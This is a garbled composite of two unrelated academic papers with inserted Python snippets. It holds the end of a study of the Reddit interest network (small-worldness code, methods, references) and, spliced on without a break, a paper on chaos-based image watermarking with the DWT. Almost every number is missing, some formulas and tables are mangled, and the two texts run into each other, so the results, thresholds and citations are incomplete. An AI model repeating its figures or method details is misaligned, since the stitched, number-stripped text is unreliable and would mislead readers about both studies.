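    """Humphries & Gurney small-worldness S = (C/C_rand) / (L/L_rand);
    S > 1 indicates a small-world network. G is assumed to be connected."""
    n, m = G.number_of_nodes(), G.number_of_edges()
    C = nx.average_clustering(G)
    L = nx.average_shortest_path_length(G)

    C_rand = L_rand = 0.0
    for i in range(n_random):
        R = nx.gnm_random_graph(n, m, seed=seed + i)
        giant = R.subgraph(max(nx.connected_components(R), key=len))
        C_rand += nx.average_clustering(R) / n_random
        L_rand += nx.average_shortest_path_length(giant) / n_random

    return {"C": C, "L": L, "C_rand": C_rand, "L_rand": L_rand,
            "S": (C / C_rand) / (L / L_rand),
            "log_N": math.log(n)}   # Eq. (1): L_sw should be close to log(N)
```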
given previous work that suggests net- work properties such as small-worldness and even modularity can result solely from network growth processes [ ], it would be interesting in future work to observe what processes govern network growth when users have access to an interests map like those shown in figures and , and what network properties emerge from these growth processes. this work provides a unique view of reddit that debunks a common misconception of the social news web site. typically, outsiders view reddit as a single, homogeneous entity that acts as one, e.g. “should reddit be blamed for the spreading of a smear?” [ ]. in contrast, the reddit interest map shown here provides a different view of reddit, where many users organize themselves into cliques based on shared interests and rarely interact with other reddit users outside their clique. in that light, we hope this work reveals that, like many social communities (online or offline), reddit is a community composed of a diverse group of people that are brought together by thousands of seemingly-unrelated interests. additionally, we explored the network properties of the backbone reddit interest network that we composed from the posting behavior of over , active reddit users. in this analysis, we found that the reddit interest network has a scale-free, small-world, and modular community structure, corroborating findings in many other online social networks [ , ]. uniquely, reddit potentially enforces a scale- free network structure on its users by automatically subscribing all new users to the same set of subreddits [ ]. exploring the effect of automatically subscribing users to a fixed set of interest-specific forums on social interest network structure could be another interesting venue of future work. to expedite future analyses of the reddit interest network, we have provided the raw, anonymized data set available to download online [ ]. it is important to note that the sample of user behavior we have taken is cross-sectional, reflecting users’ reddit posts and thus the relationships among reddit interests at a fixed point in time in mid- . however, as users’ interests evolve, so too do the relationships among them [ ]. in some cases, highly specialized and related subreddits may fuse into a single subreddit, while in other cases a general subreddit may split into multiple more specialized ones. thus, such an interest map would require periodic (or, ideally, real-time) updating to accurately reflect dominant interests in the social network and their relationships to one another. methods to acquire the data for this study, we mined user posting behavior data from reddit by first gathering the user names of , active users that post to , distinct subreddits (see table s for more detail). we note that reddit reports to have over . million registered users as of december [ ], so this data set represents a random sample of roughly / of the total active users on reddit. for each of the users, we gathered their , most recent link submissions and comments, counted how many times they post to each subreddit, and registered them as interested in a subreddit only if they posted there at least times. we applied this threshold of at least posts to filter out users that are not active in a particular subreddit. from these data, we defined a bipartite network x, where xij = if user i is an active poster in subreddit j and otherwise is . 
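The bipartite matrix just defined, together with the weighted projection and disparity-filter backbone described in the following paragraphs, can be illustrated with a compact sketch of the whole pipeline. The input format, the placeholder activity threshold of 10 posts (the paper's exact threshold is not reproduced here), and the use of dense numpy arrays (the full data set would call for scipy.sparse) are assumptions made for the example; the backbone step follows the Serrano et al. disparity filter cited in the text.

```python
import numpy as np
import networkx as nx

def project_interests(post_counts, min_posts=10):
    """Build the binary user-by-subreddit matrix X and the co-posting matrix Y,
    whose entry (i, j) counts users active in both subreddits i and j."""
    users = sorted(post_counts)
    subs = sorted({s for counts in post_counts.values() for s in counts})
    index = {s: j for j, s in enumerate(subs)}

    X = np.zeros((len(users), len(subs)), dtype=np.int32)
    for i, user in enumerate(users):
        for sub, c in post_counts[user].items():
            if c >= min_posts:
                X[i, index[sub]] = 1

    Y = X.T @ X                     # subreddit-by-subreddit co-posting counts
    np.fill_diagonal(Y, 0)
    return subs, Y

def disparity_backbone(subs, Y, alpha=0.05):
    """Keep an edge only if its weight is significant at level alpha from the
    perspective of both endpoints (disparity filter of Serrano et al.)."""
    strength = Y.sum(axis=1)
    degree = (Y > 0).sum(axis=1)

    def significant(i, j):
        k, s = degree[i], strength[i]
        if k <= 1 or s == 0:
            return False
        p = Y[i, j] / s
        return (1.0 - p) ** (k - 1) < alpha

    G = nx.Graph()
    n = len(subs)
    for i in range(n):
        for j in range(i + 1, n):
            if Y[i, j] > 0 and significant(i, j) and significant(j, i):
                G.add_edge(subs[i], subs[j], weight=float(Y[i, j]))
    return G
```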
we then projected this as a weighted unipartite network y as xx′, where yij is the number of users that post in both subreddits i and j. this resulted in , , non-zero edges between the subreddits. details of the raw weighted subreddit network are shown in table . due to the challenges associated with analyzing large weighted networks, we reduced the number of edges in the weighted subreddit network using a backbone extraction algorithm [ ]. this backbone extraction algorithm preserves edges whose weight is statistically incompatible, at a given level of signif- icance α, with a null model in which edge weights are distributed uniformly at random. in the resulting table . edge weights in the raw and backbone reddit interest networks network mean minimum maximum raw . , backbone . . . backbone network, two subreddits are linked if the number of users who post in both of them is statis- tically significantly larger than expected in a null model, from the perspective of both subreddits. to combine the directed edges between each two nodes, we replaced the two directed edges with a single undirected edge whose weight is the average of the two directed edges. thus, this technique defines a network of subreddit pathways along which there is a high probability users might traverse if they navigate reddit by following the posts of other users. adjusting the α parameter allows the backbone network to include more (e.g., when α if larger) or fewer (e.g., when α is smaller) such pathways. figure summarizes the topological properties of backbones extracted using a range of α parameter values; in the findings and discussion we focus on a backbone extracted using the conventional α = . . we used python’s praw package to gather the data and python’s networkx package [ ] to compute all network statistics. in the backbone graph, we focus only on the largest connected component. we detected network communities using [ ] and visualized the communities using the openord node layout, both as implemented in gephi [ ]. acknowledgments we gratefully acknowledge the support of the michigan state university high performance computing center and the institute for cyber enabled research (icer). we thank arend hintze, christoph adami, and emily weigel for helpful feedback during the preparation of this manuscript. references . rainie l, wellman b ( ) networked: the new social operating system. the mit press. . strand jl ( ) facebook: trademarks, fan pages, and community pages. intellectual property & technology law journal : – . . chang hc ( ) a new perspective on twitter hashtag use: diffusion of innovation theory. pro- ceedings of the american society for information science and technology : – . . gilbert e ( ) widespread underprovision on reddit. in: proceedings of the conference on computer supported cooperative work. new york, ny, usa: acm, cscw ’ , pp. – . doi: . / . . . boguna m, krioukov d, claffy kc ( ) navigability of complex networks. nature physics : – . . benevenuto f, rodrigues t, cha m, almeida v ( ) characterizing user navigation and inter- actions in online social networks. information sciences : – . . albert r, jeong h, barabási al ( ) internet: diameter of the world-wide web. nature : – . python reddit api wrapper (praw): https://github.com/praw-dev/praw https://github.com/praw-dev/praw . barabási al, albert r, jeong h ( ) scale-free characteristics of random networks: the topology of the world-wide web. physica a: statistical mechanics and its applications : – . . reddit ( ). what is reddit? 
url http://www.reddit.com/wiki/faq#wiki_what_is_reddit. f. . alexa ( ). reddit alexa ranking. url http://www.alexa.com/siteinfo/reddit.com. . olson rs ( ). redditviz, the interactive reddit interest map. url http://rhiever.github. io/redditviz/clustered/. . sanderson b, rigby m ( ) we’ve reddit, have you? what librarians can learn from a site full of memes. college & research libraries news : – . . wasike bs ( ) framing social news sites: an analysis of the top ranked stories on reddit and digg. southwestern mass communication journal . . merritt e ( ) an analysis of the discourse of internet trolling: a case study of reddit.com. ph.d. thesis. . olson rs ( ). reddit user posting behavior (mid- ). url http://dx.doi.org/ . / m .figshare. . . kumar r, novak j, tomkins a ( ) structure and evolution of online social networks. in: link mining: models, algorithms, and applications, springer. pp. – . . page l, brin s, motwani r, winograd t ( ) the pagerank citation ranking: bringing order to the web. technical report - , stanford infolab. . bastian m, heymann s, jacomy m ( ) gephi: an open source software for exploring and manipulating networks. in: adar e, hurst m, finin t, glance ns, nicolov n, et al., editors, icwsm. the aaai press. . reddit ( ). saying goodbye to an old friend and revising the default subreddits. url http: //blog.reddit.com/ / /saying-goodbye-to-old-friend-and.html. . barabási al, albert r ( ) emergence of scaling in random networks. science : - . . humphries md, gurney k ( ) network small-world-ness: a quantitative method for determin- ing canonical network equivalence. plos one : e . . hintze a, adami c ( ) modularity and anti-modularity in networks with arbitrary degree distribution. biology direct : +. . kang jc ( ). the new york times: should reddit be blamed for the spreading of a smear? url http://www.nytimes.com/ / / /magazine/ should-reddit-be-blamed-for-the-spreading-of-a-smear.html?pagewanted=all. . ahn yy, han s, kwak h, moon s, jeong h ( ) analysis of topological characteristics of huge online social networking services. in: proceedings of the th international conference on world wide web. new york, ny, usa: acm, www ’ , pp. – . doi: . / . . . mislove a, marcon m, gummadi kp, druschel p, bhattacharjee b ( ) measurement and anal- ysis of online social networks. in: proceedings of the th acm sigcomm conference on internet measurement. new york, ny, usa: acm, imc ’ , pp. – . doi: . / . . http://www.reddit.com/wiki/faq#wiki_what_is_reddit. f http://www.reddit.com/wiki/faq#wiki_what_is_reddit. f http://www.alexa.com/siteinfo/reddit.com http://rhiever.github.io/redditviz/clustered/ http://rhiever.github.io/redditviz/clustered/ http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://blog.reddit.com/ / /saying-goodbye-to-old-friend-and.html http://blog.reddit.com/ / /saying-goodbye-to-old-friend-and.html http://www.nytimes.com/ / / /magazine/should-reddit-be-blamed-for-the-spreading-of-a-smear.html?pagewanted=all http://www.nytimes.com/ / / /magazine/should-reddit-be-blamed-for-the-spreading-of-a-smear.html?pagewanted=all . banerjee n, chakraborty d, dasgupta k, mittal s, joshi a, et al. ( ) user interests in social media sites: an exploration with micro-blogs. in: proceedings of the th acm conference on information and knowledge management. new york, ny, usa: acm, cikm ’ , pp. – . doi: . / . . . reddit ( ). about reddit. url http://www.reddit.com/about. . 
serrano m, bogu m, vespignani a ( ) extracting the multiscale backbone of complex weighted networks. proceedings of the national academy of sciences : - . . hagberg aa, schult da, swart pj ( ) exploring network structure, dynamics, and function using networkx. in: proceedings of the th python in science conference (scipy ). pasadena, ca usa, pp. – . . blondel vd, guillaume jl, lambiotte r, lefebvre e ( ) fast unfolding of communities in large networks. journal of statistical mechanics: theory and experiment : p . http://www.reddit.com/about supplementary information table s . descriptive statistics of the bipartite (user-to-subreddit) network statistic value total # of users , total # of subreddits , average # of subreddits per user . minimum # of subreddits per user maximum # of subreddits per user average # of users per subreddit . minimum # of users per subreddit maximum # of users per subreddit , international journal of advanced network monitoring and controls volume , no. , image watermarking encryption scheme based on fractional order chaotic system dawei ding , zongzhi li and shujia li school of electronic information engineering, anhui university, hefei , china. email: dwding@ahu.edu.cn, @qq.com, @qq.com abstract. now the chaotic system and wavelet transform are more and more widely used in the watermarking technology. at the same time, the fractional order chaotic system has more complex dynamic characteristics than the integer order system. so a new image watermarking scheme based on the fractional order chen chaotic system and discrete wavelet transform is proposed. chaotic sequences generated by chaotic system are used to encrypt the watermark image, and the processed watermark information is embedded into the original image by the discrete wavelet transform. finally, the security analysis of the proposed watermarking algorithm is presented. the experimental results show that the proposed watermarking scheme has high security, and it has stronger robustness and invisibility compared with the previous work. keywords: fractional order chaotic system, discrete wavelet transform(dwt), image watermarking, security, robustness, invisibility . introductiong with the rapid development of network technology,all kinds of digital media are more convenient to spread through the network,the security of digital media becomes more and more important in the network. copyright protection is one of the important aspects.digital watermarking technique is a kind of information hiding technique, it can be used as a kind of more effective copyright protection of digital works and anti fake technology. at present, the chaotic system is more and more widely used in the watermarking technology and has achieved good results, a considerable part of chaos-based image watermarking schemes are proposed[ – ]. poonkuntran and rajesh proposed a new imperceptible image watermarking scheme for active authentication for images[ ]. the scheme used chaotic system to process the watermark, and used the integer transform to embed the watermark information. tong xiaojun et al. proposed an image watermarking technique based on scrambling and self restoration[ ]. a coupled chaotic map was used to scramble the original image block by block. behnia et al. proposed an image watermarking scheme based on double chaotic map[ ]. one map was used to encrypt the embedded position, and another one was used to determine the pixels of the host image. gao tiegang et al. 
proposed an image watermark authentication method based on neural network with hyper chaotic characteristics[ ]. the method used the authentication password as the key, and the pixel value was used as the input of the neural network. mooney et al. used the combination of white noise and chaotic sequence to encrypt the watermark[ ]. international journal of advanced network monitoring and controls volume , no. , gao guangyong et al. used composite chaos to encrypt the watermarking image, and resisted the geometric attack based on a composite-chaos optimized support vector regression(svr) model [ ]. watermarking methods can mainly be divided into three types according to the restore information: non-blind, semi-blind and blind watermarking methods[ ]. non-blind methods need all the information of the original image and the key. semi-blind methods need watermark sequence and the key, and blind methods need key only. watermarking methods can be divided into two other types according to the embedding strategy: ) spatial domain watermarking: the value of the image element is changed directly, and the hidden content is added in the brightness of the image element, however, this method is easy to be obtained, and the robustness of the image processing is poor. ) transform domain watermarking: use a mathematical transformation to transform the image into the transform domain, and add the information by changing some transform coefficients of image, and then use the inverse transform to recover the hidden watermark information and image. the advantages of using transform technique include the ability to ensure that the watermark is not visible and resistance to the corresponding lossy compression. keyvanpour et al. proposed a watermarking method based on chaotic map and operation of transform domain[ ]. the coding process was special and the key was generated by chaotic map, the wavelet quantization process was used to transfer the sequence. zhang dengyin et al. proposed a watermarking algorithm based on one-dimensional ( -d) chaotic map in wavelet transform (wt) domain[ ]. the watermark was encoded by a chaotic sequence and embedded into the low-and intermediate-frequency bands of three-layer wt domain. barni et al. proposed a watermarking method based on discrete wavelet transform, the embedded operation was done in the high frequency part[ ]. in addition, there are many examples of the combination of wavelet transform and other operations[ - ]. therefore, it is feasible to use discrete wavelet transform(dwt) and chaotic system to encrypt the watermark. at the same time, the research shows that the low dimensional chaotic system has the defects of the limited key space and the worrying security, but the high dimensional chaotic systems have higher complexity, randomness and unpredictability, and it can better resist the attack of phase space reconstruction and other methods[ ]. the chen’s system is a three-dimensional chaotic system with complex topology than lorenz attractor. the fractional order chaotic dynamics system has more complex and richer dynamic characteristics than the integer order system, and it has the advantage of increasing the randomness and unpredictability, moreover, the fractional order system can also provide more key parameters and increase the key space for the encryption system, so it will improve the encryption effect of the system. 
inspired by the above analysis, a new image watermarking scheme based on the fractional order chen chaotic system and the discrete wavelet transform is proposed. first, chaotic sequences generated by the chaotic system are used to encrypt the watermark image; then the processed watermark information is embedded into the original image by the discrete wavelet transform. the remainder of the study is organized as follows. in section , the related theoretical work is introduced in detail. in section , the process of the proposed watermarking algorithm is described in detail. experimental results and security analysis are given in section , and the final conclusion is given in section .

. related works

. the fractional-order chen's chaotic system

consider the fractional-order chen's chaotic system[ ] described by

$$\frac{d^{\alpha}x}{dt^{\alpha}} = a\,(y - x), \qquad \frac{d^{\beta}y}{dt^{\beta}} = (c - a)\,x - xz + cy, \qquad \frac{d^{\gamma}z}{dt^{\gamma}} = xy - bz$$

where $\alpha, \beta, \gamma$ are the fractional derivative orders, $(x, y, z)$ are the state variables, and $a, b, c > 0$ are the parameters of the system.

the grunwald-letnikov definition of the fractional derivative[ ] is

$${}_{a}D_{t}^{\upsilon} f(t) = \lim_{h \to 0}\, h^{-\upsilon} \sum_{j=0}^{[(t-a)/h]} (-1)^{j} \binom{\upsilon}{j}\, f(t - jh), \qquad \upsilon > 0$$

where $a$ and $t$ are the lower and upper limits of integration, $\upsilon$ is the fractional derivative order, $h$ is the integration time step, and $[x]$ denotes the integer part of $x$. the generalized binomial coefficient is

$$\binom{\alpha}{j} = \frac{\alpha(\alpha - 1)\cdots(\alpha - j + 1)}{j!}$$

for a fixed step size $h$ and grid point $t_m = mh$, the derivative can therefore be approximated by

$$D^{\alpha} y(t_m) \approx h^{-\alpha} \sum_{j=0}^{m} \omega_{j}^{(\alpha)}\, y_{m-j}, \qquad \omega_{j}^{(\alpha)} = (-1)^{j}\binom{\alpha}{j}, \quad j = 0, 1, 2, \ldots$$

applying this approximation to each equation of the chen system gives

$$h^{-\alpha}\sum_{j=0}^{m}\omega_{j}^{(\alpha)} x_{m-j} = a\,(y_m - x_m), \qquad h^{-\beta}\sum_{j=0}^{m}\omega_{j}^{(\beta)} y_{m-j} = (c - a)\,x_m - x_m z_m + c\,y_m, \qquad h^{-\gamma}\sum_{j=0}^{m}\omega_{j}^{(\gamma)} z_{m-j} = x_m y_m - b\,z_m$$

and solving for the current state yields

$$x_m = \frac{a h^{\alpha} y_m - \sum_{j=1}^{m} \omega_{j}^{(\alpha)} x_{m-j}}{1 + a h^{\alpha}}, \qquad y_m = \frac{h^{\beta}\bigl((c - a) - z_m\bigr) x_m - \sum_{j=1}^{m} \omega_{j}^{(\beta)} y_{m-j}}{1 - c h^{\beta}}, \qquad z_m = \frac{h^{\gamma} x_m y_m - \sum_{j=1}^{m} \omega_{j}^{(\gamma)} z_{m-j}}{1 + b h^{\gamma}}$$

because $x_m$, $y_m$ and $z_m$ appear on both sides, they are defined implicitly, and an iterative algorithm is used to compute them:

$$x_m^{(l)} = \frac{a h^{\alpha} y_m^{(l-1)} - \sum_{j=1}^{m} \omega_{j}^{(\alpha)} x_{m-j}}{1 + a h^{\alpha}}, \qquad y_m^{(l)} = \frac{h^{\beta}\bigl((c - a) - z_m^{(l-1)}\bigr) x_m^{(l)} - \sum_{j=1}^{m} \omega_{j}^{(\beta)} y_{m-j}}{1 - c h^{\beta}}, \qquad z_m^{(l)} = \frac{h^{\gamma} x_m^{(l)} y_m^{(l)} - \sum_{j=1}^{m} \omega_{j}^{(\gamma)} z_{m-j}}{1 + b h^{\gamma}}$$

where $l$ is the iteration number. the iteration stops when $|x_m^{(l)} - x_m^{(l-1)}| < \delta$, $|y_m^{(l)} - y_m^{(l-1)}| < \delta$ and $|z_m^{(l)} - z_m^{(l-1)}| < \delta$ for a very small tolerance $\delta$, and then $x_m = x_m^{(l)}$, $y_m = y_m^{(l)}$, $z_m = z_m^{(l)}$. the system exhibits chaotic behavior when the step size $h$, the derivative orders $(\alpha, \beta, \gamma)$, the parameters $a, b, c$ and the initial conditions $(x_0, y_0, z_0)$ take the values chosen for this scheme; the projections of the resulting attractor are shown in fig. . the chaotic system produces chaotic sequences, and these sequences are used to encrypt the watermark image. the result is a chaotic encrypted image, which is then used when embedding the wavelet coefficients [ ].

figure. the attractors of the system described in eq. ( ): (a) x-y plane, (b) y-z plane, (c) x-z plane, (d) x-y-z plane.
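as a concrete illustration of the discretization above, the following python sketch generates the three chaotic sequences with the grunwald-letnikov scheme. it is a minimal sketch, not the authors' code: the inner fixed-point iteration is replaced by a one-pass update that uses the previous-step values, and the default parameter values (a, b, c, the orders and the step size h) are common illustrative choices for the fractional chen system rather than the values used in the paper.

```python
import numpy as np

def gl_weights(alpha, n):
    """grunwald-letnikov weights w_j = (-1)^j * C(alpha, j), via the recurrence
    w_0 = 1, w_j = w_{j-1} * (1 - (alpha + 1) / j)."""
    w = np.empty(n + 1)
    w[0] = 1.0
    for j in range(1, n + 1):
        w[j] = w[j - 1] * (1.0 - (1.0 + alpha) / j)
    return w

def fractional_chen(n_steps, h=0.01, orders=(0.9, 0.9, 0.9),
                    a=35.0, b=3.0, c=28.0, x0=(0.1, 0.2, 0.3)):
    """explicit grunwald-letnikov integration of the fractional-order chen system.

    note: the defaults (h, orders, a, b, c, x0) are illustrative values commonly
    used for the chen system, not the settings of the paper."""
    al, be, ga = orders
    wa, wb, wc = (gl_weights(o, n_steps) for o in orders)
    x = np.zeros(n_steps + 1)
    y = np.zeros(n_steps + 1)
    z = np.zeros(n_steps + 1)
    x[0], y[0], z[0] = x0
    for m in range(1, n_steps + 1):
        # memory terms: sum_{j=1..m} w_j * state_{m-j}
        mx = np.dot(wa[1:m + 1], x[m - 1::-1])
        my = np.dot(wb[1:m + 1], y[m - 1::-1])
        mz = np.dot(wc[1:m + 1], z[m - 1::-1])
        # one-pass update; the paper refines these values by fixed-point iteration
        x[m] = (a * h**al * y[m - 1] - mx) / (1.0 + a * h**al)
        y[m] = (h**be * ((c - a) - z[m - 1]) * x[m] - my) / (1.0 - c * h**be)
        z[m] = (h**ga * x[m] * y[m] - mz) / (1.0 + b * h**ga)
    return x, y, z

# the three sequences can then be quantized/permuted to form the encryption key stream
xs, ys, zs = fractional_chen(5000)
```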
. discrete wavelet transform

in image processing, lossy compression can damage a digital watermark, so the characteristics of lossy compression must be taken into account to obtain maximum robustness when embedding and extracting the watermark. the dwt is a local transformation with multi-scale analysis capability. using the wavelet transform, the original image can be decomposed into sub-images of different frequencies that match the visual characteristics of the human eye, and watermark embedding and detection can be carried out at several levels. wavelet-domain watermarking combines the advantages of spatial-domain methods and dct-domain methods. a two-dimensional image is decomposed into different frequency components at each level of the transformation; the first level of decomposition yields the sub-bands ll1, lh1, hl1 and hh1 [ ]. most of the image information is contained in the low-frequency component ll1, while lh1, hl1 and hh1 are high-frequency components that contain the specific details. the decomposition can be continued by decomposing ll1 to obtain ll2, lh2, hl2 and hh2, and the process is repeated until the required decomposition level is reached, i.e. lln, where n is the decomposition level. the wavelet coefficients can later be used to restore the original image; this inverse process of the dwt is known as the idwt.

. proposed watermarking algorithm

this part gives a detailed introduction to the watermark embedding algorithm and the extraction algorithm. the size of the original image i is M × N and the size of the binary watermark image w is m × n.

. embedding watermarking

two sets of fractional derivative orders and initial conditions for eq. ( ), $(\alpha, \beta, \gamma)$, $(\alpha', \beta', \gamma')$ and $(x_0, y_0, z_0)$, $(x_0', y_0', z_0')$, are given and act as the key. the specific steps of the embedding algorithm are as follows:

step 1. apply a two-level dwt to the original image to obtain the four parts ll2, lh2, hl2 and hh2; the embedding operation is performed on these four parts.

step 2. given the key as input, the chaotic system produces two chaotic sequences, and the watermark is scrambled and encrypted. the result is denoted u.

step 3. the encrypted binary watermark is embedded into the original image according to

$$i'(i, j) = i(i, j) + \alpha\, u(i, j)$$

where $\alpha$ is the visibility factor used in the proposed scheme and $i(i, j)$ is a second-level wavelet coefficient. the embedding computation is the same for all four parts, i.e. ll2, lh2, hl2 and hh2.

step 4. apply a two-level idwt to $i'(i, j)$ for each part to obtain the watermarked image for that part.

step 5. combine the four parts to obtain the watermarked image.

the flow chart of embedding watermarking is shown in fig. .
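a minimal sketch of the embedding steps above, using the pywavelets package: the 'haar' wavelet, the visibility factor value and the tiling of the encrypted watermark u to the sub-band size are illustrative assumptions, and the chaotic scrambling/encryption of the watermark (step 2) is assumed to have been done beforehand.

```python
import numpy as np
import pywt

def embed_watermark(host, u, alpha=0.1, wavelet="haar"):
    """embed an (already encrypted) binary watermark u into the second-level
    dwt sub-bands of a grayscale host image.

    alpha and the wavelet are illustrative assumptions, not the paper's values.
    """
    # two-level decomposition: level 1, then decompose ll1 again
    ll1, (lh1, hl1, hh1) = pywt.dwt2(host.astype(float), wavelet)
    ll2, (lh2, hl2, hh2) = pywt.dwt2(ll1, wavelet)

    # additive rule i'(i,j) = i(i,j) + alpha * u(i,j), applied to every level-2 part;
    # the watermark is tiled/truncated to the sub-band shape for this sketch
    u2 = np.resize(u, ll2.shape).astype(float)
    ll2w, lh2w, hl2w, hh2w = (band + alpha * u2 for band in (ll2, lh2, hl2, hh2))

    # inverse transform back to the image domain, guarding against odd sizes
    ll1w = pywt.idwt2((ll2w, (lh2w, hl2w, hh2w)), wavelet)[:ll1.shape[0], :ll1.shape[1]]
    marked = pywt.idwt2((ll1w, (lh1, hl1, hh1)), wavelet)
    return marked[:host.shape[0], :host.shape[1]]
```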
. extracting watermarking

the process of extracting the watermark is the reverse of the embedding procedure. it can be briefly described as follows:

step 1. apply a two-level dwt to the watermarked image and extract all the parts.

step 2. apply a two-level dwt to the original image.

step 3. with the help of the chaotic system, the chaotic sequences are regenerated.

step 4. extract the wavelet coefficients of the embedded watermark; all four parts are calculated according to

$$u(i, j) = \frac{i'(i, j) - i(i, j)}{\alpha}$$

step 5. use the chaotic sequence to decrypt the encrypted watermark.

figure. the flowchart of embedding watermarking: generating the key, obtaining the chaotic sequence, permuting the watermark, embedding the watermark by dwt, and outputting the watermarked image.

. experimental results and security analysis

this section presents the experimental results and the security analysis of the proposed algorithm. first, the experimental results are given and the embedding efficiency is calculated, together with the results of the proposed scheme under various attacks. then the encryption-security tests for the proposed scheme are given, such as the grey histogram, the key space and the key sensitivity.

. experimental results

a watermarking scheme usually needs to satisfy properties such as "embedding efficiency" and robustness against "attacks". the experimental results for these properties are as follows.

) experimental results

in this section, the standard lena image (size × ) is used as the host image and a binary logo (size × ) is used as the watermark image. the two sets of initial conditions and fractional derivative orders for the chaotic system are fixed and serve as the key. the results of watermark embedding and extraction are shown in fig. . the embedding of the watermark can be considered effective if the raw data and the processed data cannot be distinguished. to show the effect of the proposed scheme more directly, the peak signal-to-noise ratio (psnr) is used to evaluate the image quality:

$$\mathrm{psnr} = 10 \log_{10}\!\left(\frac{255^{2}}{\mathrm{mse}}\right) \; \mathrm{db}$$

the mean squared error (mse) between the original image and the watermarked image is defined as

$$\mathrm{mse} = \frac{1}{M \times N} \sum_{i=0}^{M-1} \sum_{j=0}^{N-1} \bigl(i(i, j) - i'(i, j)\bigr)^{2}$$

where $i(i, j)$ and $i'(i, j)$ are the pixel values at location $(i, j)$ and the image size is M × N. in this study, the bit error rate (ber) of the extracted watermark is used to test reliability:

$$\mathrm{ber} = \frac{b}{m \times n}$$

where b is the number of erroneously detected bits and the size of the extracted watermark image is m × n. the psnr value of the watermarked image is . db, and the ber value of the extracted watermark is zero. therefore, there is almost no perceptible distortion between the original image and the watermarked image; the process of embedding the watermark does not affect the quality of the image.

figure. experimental results: (a) host image, (b) watermark image, (c) watermarked image, (d) extracted watermark image.

) attacks

in order to test the robustness, several different attacks are applied. common signal-processing attacks include:

( ) jpeg compression: jpeg is the abbreviation of joint photographic experts group; the jpeg image compression algorithm provides good compression performance and good reconstruction quality, and it is widely used in image and video processing [ , ]. the compression ratio of the proposed scheme is : .

( ) filtering: filtering removes specific frequency bands of the signal; it is an important measure to restrain and prevent interference.
( ) noise addition: the probability density function of gaussian noise obeys gauss distribution (i.e. normal distribution). if the amplitude distribution of a noise obeys gauss distribution, and its power spectrum density is uniformly distributed, it is called gaussian white noise [ , , ]. the proposed scheme adds the gaussian noise, whose mean value is and the variance is . . ( )histogram equalization: histogram equalization is a method to adjust the contrast in the field of image processing using image histogram [ , , ]. ( ) contrast adjustment: contrast of the watermarked image is improved by %. ( ) gamma correction: gamma correction can edit the gamma curve of image, recognize the dark part and light part of the image signal, and increase the proportion of the image. the gamma value of the proposed theme is reduced to . . the test results for watermarked image are given in table . it can be clearly displayed from the table that the proposed scheme performs better. image watermarking encryption scheme based on fractional order chaotic system table comparsion result of psnr values between proposed scheme and previous work psnr[db] attacks proposed scheme rawat ea al[ ] gaussian noise . . contrast enhancement . . average filtering . . median filtering . . gamma correction . . histogram equalization . . jpeg(q= ) . . . security analysis and simulation for proposed scheme ) the grey histogram analysis the histogram reflects the basic statistical characteristics of the image. compare the grey histograms of the original image and the watermarked image, the statistical performance is analyzed. fig. shows the histograms of the original image and the watermarked image. from the figure, it is clear that two histograms are almost the same. the real information of the watermark image has been well hidden, it is not easy to use statistical characteristics to attack the watermarked image. so, the proposed algorithm can well resist statistical attack. ) the space of key for an encryption scheme, key space should be enough large to resist brute-force attack. in proposed scheme, the initial key consists of many elements. so the key of the system can be set ( ) , , ,a bα γ , each key parameter is independent of each other. in practical design, a and b are impossible to be infinitely large, their range can be set , a b< < . according to the precision of the double precision floating point of the computer, the scheme takes bytes and effective numbers to analyze the data. so the key space is equivalent to × × × = , which is able to resist the brute-force attack. (a) the histogram of the original image (b) the histogram of the watermarked image figure. the grey histograms international journal of advanced network monitoring and controls volume , no. , ) key sensitivity a good encryption scheme needs not only a large key space, but also it must be sensitive to the key parameters. only in this way can it be able to resist the differential attack. in the test, the key used in the scheme is ( . , . , , ). in order to test the sensitivity of the algorithm to the key, some error keys are used to extract the watermark image. as can be clearly seen from fig. , the proposed scheme is very sensitive to the key parameters, even if a single key parameter is only . of the deviation, it will lead to a completely different extraction result. (a)extracted watermark by the (b) extracted watermark by the (c) extracted watermark by the correct key: ( . , . , , ) wrong key: ( . , . , , ) wrong key: ( . , . , , . ) figure. 
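the robustness and key-sensitivity tests reported above amount to degrading the watermarked image, re-running the extraction, and recomputing the quality metrics. the sketch below wires this together in python; the wavelet, the visibility factor, the noise variance and the commented example values are illustrative assumptions rather than the paper's settings, and the chaotic decryption of the extracted bits is omitted.

```python
import numpy as np
import pywt

def extract_watermark(watermarked, original, wm_shape, alpha=0.1, wavelet="haar"):
    """u(i,j) = (i'(i,j) - i(i,j)) / alpha, read from the second-level ll band.

    the chaotic decryption / inverse permutation of the recovered bits is omitted."""
    ll2_w = pywt.wavedec2(watermarked.astype(float), wavelet, level=2)[0]
    ll2_o = pywt.wavedec2(original.astype(float), wavelet, level=2)[0]
    u = (ll2_w - ll2_o) / alpha
    return (np.resize(u, wm_shape) > 0.5).astype(np.uint8)   # threshold back to bits

def psnr(reference, test, peak=255.0):
    """peak signal-to-noise ratio in db, assuming an 8-bit pixel range."""
    mse = np.mean((reference.astype(float) - test.astype(float)) ** 2)
    return 10.0 * np.log10(peak ** 2 / mse)

def ber(extracted_bits, original_bits):
    """bit error rate: fraction of erroneously detected watermark bits."""
    return np.count_nonzero(extracted_bits != original_bits) / original_bits.size

def gaussian_noise_attack(image, var=0.001, seed=0):
    """additive gaussian noise on a [0, 255] image (variance given on a [0, 1] scale)."""
    noise = np.random.default_rng(seed).normal(0.0, np.sqrt(var), image.shape) * 255.0
    return np.clip(image + noise, 0.0, 255.0)

# illustrative end-to-end check, reusing embed_watermark from the earlier sketch
# (synthetic images and all parameter values are assumptions, not the paper's data):
#   wm       = (np.random.default_rng(1).random((32, 32)) > 0.5).astype(np.uint8)
#   host     = np.random.default_rng(2).random((512, 512)) * 255.0
#   marked   = embed_watermark(host, wm, alpha=0.1)
#   attacked = gaussian_noise_attack(marked)
#   print("psnr of attacked image:", psnr(host, attacked))
#   print("ber of extracted bits :", ber(extract_watermark(attacked, host, wm.shape), wm))
```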
